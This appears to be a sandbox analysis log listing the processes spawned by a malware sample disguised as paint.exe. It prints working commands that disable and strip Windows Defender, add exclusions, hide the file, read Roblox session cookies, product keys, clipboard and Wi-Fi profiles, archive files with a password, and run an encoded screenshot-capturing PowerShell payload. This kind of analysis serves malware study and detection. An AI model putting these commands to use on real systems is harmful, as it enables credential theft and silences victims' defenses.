Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\paint.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7663.tmp" "c:\Users\user\AppData\Local\Temp\u3oq5ojt\CSCF0203E537737442CADEFC214ABE2ED32.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaee